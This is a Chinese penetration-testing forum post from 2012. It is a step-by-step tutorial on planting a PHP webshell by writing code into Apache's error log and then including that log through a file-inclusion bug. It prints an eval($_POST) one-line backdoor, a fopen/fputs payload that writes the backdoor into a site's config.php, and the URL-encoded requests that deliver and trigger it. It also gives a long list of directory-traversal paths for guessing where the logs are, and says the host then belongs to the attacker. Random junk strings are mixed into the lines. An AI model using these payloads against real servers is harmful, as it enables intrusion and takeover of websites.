找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1818|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 * a6 o' r* z5 \4 P9 {

6 [+ O& [) j5 P) b% \7 d比如还是这句一句话木马 ' w7 C9 y3 J2 e. d
<?eval($_POST[cmd]);?>   
5 k# D4 l0 p) z* \# q- V) ~% s0 {
, k5 i! V( c# E到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
: J& u+ W5 j* r1 [! [. l. G& {0 Yfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
: S0 ^" A, O0 K  I$ D- ^* v0 P9 A! Z) ]0 |9 Y, V: V& Q
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
: D" L7 N  E* O2 tfclose($fp);?>   //在config.php里写入一句木马语句 3 H' V2 L  T- u/ L

) M; @0 `6 \) z  `4 f$ l7 j我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
. q  R* I5 Q& V$ Z3 v转换为
1 a& f7 n& X5 ?9 Y3 p%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
( Q' L# g+ A' [  m; lconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
' X1 i& k7 s; c, R4 ?, ?%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B 6 \" D4 r  ^4 }, k+ L
fclose%28%24fp%29%3B%3F%3E # o, K6 ?0 B' Q. j6 T  v
我们提交 8 }4 {( X. v1 ?- c2 v1 i
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
" }5 J+ W' t9 k, `1 V) M; r%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
9 D( r7 I- }) r5 w! N%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ( s3 i1 w! Q3 U$ ~
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E   Z# Z! _+ l, w5 s* l

1 N9 l& w" |# m3 X+ i这样就错误日志里就记录下了这行写入webshell的代码。
, \$ L% _3 i1 F( K' a% \' U+ j我们再来包含日志,提交
2 F0 O+ b/ p. H( c2 ohttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
- j4 L1 R/ ~$ n" i+ V' X8 d
. @1 [/ A) r" F这样webshell就写入成功了,config.php里就写入一句木马语句
. h& W& F4 ^3 N% e- AOK. 5 [8 T7 W+ a. `; O* t  n! @
http://www.xxx.com/forum/config.php这个就成了我们的webshell + Q# B6 p2 I( r$ z+ k# T  \/ B3 T
直接用lanker的客户端一连,主机就是你的了。 / y8 \7 R4 \" e& r  c5 ?0 D
  e" ~7 N/ G1 V2 N8 ?+ P* [
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 : U; B& D) z" q0 y+ L" P/ N$ a
, }$ K- {+ ]) Y: s5 ~1 S# h. S) i
其他的日志路径,你可以去猜,也可以参照这里。 8 z7 X/ G# M# b- S
../../../../../../../../../../var/log/httpd/access_log
. z; ^8 F5 d! a$ I: O7 g: K* e../../../../../../../../../../var/log/httpd/error_log , K; r( u: |: O. ]+ L4 c
../apache/logs/error.log % J: E* Y! r7 h: p* b2 e" v
../apache/logs/access.log 8 l2 i: i( d# N3 w9 K( n+ {
../../apache/logs/error.log 6 @  R* \$ K8 [; Z+ @
../../apache/logs/access.log
0 ?2 {% I- e+ y0 U  ]& X. j" b% D../../../apache/logs/error.log
  ~' T& I7 w- ?3 {../../../apache/logs/access.log   t) _6 A5 K% L  w+ t  t' @
../../../../../../../../../../etc/httpd/logs/acces_log
7 W! d& A+ Z+ F" L# z. ^- d../../../../../../../../../../etc/httpd/logs/acces.log 5 m1 H6 ]) \) k) G& i$ _
../../../../../../../../../../etc/httpd/logs/error_log
$ _( _4 Z4 s+ z7 \../../../../../../../../../../etc/httpd/logs/error.log   M' [9 f! e! t
../../../../../../../../../../var/www/logs/access_log 1 ?5 o' f: Q4 c8 l+ O! G0 Y0 S
../../../../../../../../../../var/www/logs/access.log
/ O: G1 a0 B5 S+ x3 r7 J../../../../../../../../../../usr/local/apache/logs/access_log " u# g* }* ]7 [3 g/ `; A& K
../../../../../../../../../../usr/local/apache/logs/access.log
2 k5 {, Y9 H6 h8 d+ ^( `../../../../../../../../../../var/log/apache/access_log
. `$ z: Q$ X1 }! B# ~9 D' g. c../../../../../../../../../../var/log/apache/access.log
% D$ ?" U: g# S5 ~5 A2 s/ V../../../../../../../../../../var/log/access_log
# E. H$ b% b9 y" k4 }3 u1 w../../../../../../../../../../var/www/logs/error_log
' ]* u9 ~5 l: U: F. u; F7 Q, n../../../../../../../../../../var/www/logs/error.log
6 v6 I, D) `4 w) a/ [4 z/ L7 `../../../../../../../../../../usr/local/apache/logs/error_log
% i% U( A& H+ q6 [8 y- ~4 P../../../../../../../../../../usr/local/apache/logs/error.log
! E0 u; b) s7 s, n../../../../../../../../../../var/log/apache/error_log 2 G+ A, A1 v* ]# A. W* {) K
../../../../../../../../../../var/log/apache/error.log
9 t5 g  i9 t4 `+ p/ E../../../../../../../../../../var/log/access_log 7 w: F, f! S+ A' s* [; |, e
../../../../../../../../../../var/log/error_log
& m) G# E3 O& w. P/var/log/httpd/access_log       8 _5 p- g1 w6 s- A& w6 b
/var/log/httpd/error_log     1 G; f- }* Z" t/ o! h
../apache/logs/error.log     
1 w8 @- E* b" Q0 Y' _1 J3 Z../apache/logs/access.log
" `& c$ e7 K; z  j1 L& S2 S* @../../apache/logs/error.log * Z! N8 b: [1 h" ~5 r% d' P# B
../../apache/logs/access.log 1 Q. O' Q5 f: w8 y6 ]0 L, Y9 R
../../../apache/logs/error.log
  [1 |! D2 L9 M: m/ V/ M# Z../../../apache/logs/access.log / b* i* S* L1 B; B' P
/etc/httpd/logs/acces_log 5 w) R7 A* H# A2 ~
/etc/httpd/logs/acces.log
  m* V0 |" r' T# Y' a/etc/httpd/logs/error_log " i+ P5 w5 I1 ^/ h5 E5 T
/etc/httpd/logs/error.log
7 M6 s* S4 _7 {# O/var/www/logs/access_log # A  t% V3 K, t- A
/var/www/logs/access.log 8 n4 D: i2 M. a5 l2 d) j1 ~7 m
/usr/local/apache/logs/access_log
7 ]/ Q4 [% K/ m/usr/local/apache/logs/access.log
+ h9 x5 L( W" Q9 ]) u- |3 V7 s/var/log/apache/access_log
. r6 e( c2 |1 e' ]% a' J% g/var/log/apache/access.log
9 a3 a0 K4 N$ W9 o/var/log/access_log 6 v/ d- W" `0 @2 d/ P0 y1 s
/var/www/logs/error_log 8 Z# ~5 F' W. F4 s& q' t! e
/var/www/logs/error.log 5 h& A" D6 a5 @$ E" A. F/ b
/usr/local/apache/logs/error_log # k. g, S6 K$ m
/usr/local/apache/logs/error.log
0 Y" B6 p9 G, d3 B9 \. u/var/log/apache/error_log 1 ~6 p* U1 C, C3 w
/var/log/apache/error.log
% e+ ^. V9 r. G2 }8 v* O) x/var/log/access_log " h; V1 L" v& K  a6 }9 _
/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表